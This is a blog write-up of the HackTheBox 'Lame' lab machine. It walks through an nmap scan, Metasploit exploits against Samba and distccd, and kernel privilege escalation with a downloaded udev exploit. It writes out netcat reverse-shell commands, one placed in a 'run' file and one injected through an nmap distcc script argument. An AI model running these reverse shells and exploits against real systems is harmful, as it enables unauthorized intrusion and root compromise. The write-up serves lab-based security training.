HackTheBox - Lame write-up
This is an Easy box from HTB Labs. Lame is running multiple vulnerable services through which you can get access to the system. Lets start cracking!!!
Nmap Scanning Results
1
sudo map -sV -A 10.10.10.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PORT | Status | SERVICE | VERSION
------|--------|---------|--------
21/tcp|open | ftp |vsftpd 2.3.4
ftp-anon: Anonymous FTP login allowed (FTP code 230) <br />
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) <br />
ssh-hostkey: <br />
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)<br />
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)<br />
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)<br />
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)<br />
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))<br />
Host script results:<br />
| smb-os-discovery: <br />
| OS: Unix (Samba 3.0.20-Debian)<br />
| NetBIOS computer name: <br />
|_ Workgroup: WORKGROUP\x00<br /></p>
Exploit Searching
So theres is distccd 4.2.4, samba 3.0.20 service are running on the remote machine. After a quick search on Metasploit and Google found that both the services were vulnerble with public exploit available.
URL: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
Exploitation (with Metasploit)
Samba
Metasploit Samba Command Execuation module is the first exploit I chose to go with. I know there is auxillary script to confirm this vulnerability but who wants to run that on test machine. One must try those to check the results of those scripts. Start Metasploit and run the exploit.
Yaay!! We got the access as root user!!
distccd
I was curious about this service from the start and wanted to dig more. distccd module is also available in metasploit so lets exploit.
It worked but we got a limited shell meaning we are in as a daemon service not as root user/ standard user. Lets find a way to Privilege Escalate it.
Privilege Escalation
1
uname -a
to find out the linux kernel and os version running on the machine. Remote server kernel running foudn to be vulnerable - linux 2.6.24-16-server
Now Download the Exploit to the local machine :
1
wget http://www.exploit-db.com/download/8572
Move to “/var/www/html” and change permission. Open Apache web server on your local atacking machine
1
service apache2 start
Download exploit in remote machine /tmp folder and compile 8572.c
1
gcc 8572.c -o exploit
Now we need Create file “run” in tmp file as the exploit executes “run” file.
1
2
echo '#!/bin/bash' > run
echo '/bin/netcat -e /bin/bash 10.10.10.15 1234' >> run
Execute below to find pid of udevd
1
cat /proc/net/netlink
Start listener on local machine
And execute exploit with pid of udevd.
Got r00t!!!!
Exploitation (Without Metasploit)
Distccd
Distcc service can also be exploited without the use of metasploit by using nmap script.
To test first we run
1
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='id'"
We got the uid and gid info back meaning this script is working. now we can go ahead and get root shell.
1
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 10.10.15.102 1234'"
Now grab the flags.This was an easy and privilege escalation part was the interesting bit here.
Comments powered by Disqus.